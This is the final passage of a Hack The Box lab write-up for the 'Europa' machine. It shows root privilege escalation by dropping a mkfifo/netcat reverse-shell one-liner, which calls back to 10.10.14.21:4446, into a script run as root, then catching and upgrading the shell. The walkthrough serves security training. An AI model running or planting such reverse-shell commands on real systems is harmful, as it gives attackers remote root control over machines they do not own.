www-data@europa:/tmp$ echo "rm /tmp/h;mkfifo /tmp/h;cat /tmp/h|/bin/sh -i 2>&1|nc 10.10.14.21 4446 >/tmp/h" > /var/www/cmd/logcleared.sh www-data@europa:/tmp$ chmod +x /var/www/cmd/logcleared.sh www-data@europa:/tmp$ cat /var/www/cmd/logcleared.sh rm /tmp/h;mkfifo /tmp/h;cat /tmp/h|/bin/sh -i 2>&1|nc 10.10.14.21 4446 >/tmp/h www-data@europa:/tmp$ ls -l /var/www/cmd/logcleared.sh -rwxr-xr-x 1 www-data www-data 79 May 10 21:29 /var/www/cmd/logcleared.sh
in less than a minute, our root shell is opened.
u505@kali:~/HTB/Machines/Europa$ rlwrap nc -lnvp 4446 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4446 Ncat: Listening on 0.0.0.0:4446 Ncat: Connection from 10.10.10.22. Ncat: Connection from 10.10.10.22:60978. /bin/sh: 0: can't access tty; job control turned off # python3 -c "import pty;pty.spawn('/bin/bash')" root@europa:~# id id uid=0(root) gid=0(root) groups=0(root)
Root Flagg
root@europa:~# cat /root/root.txt cat /root/root.txt <ROOT_FLAG>
References
- Exploiting PHP PCRE Functions
- https://bitquark.co.uk/blog/2013/07/23/the_unexpected_dangers_of_preg_replace
Daniel Simao 09:16, 10 May 2020 (EDT)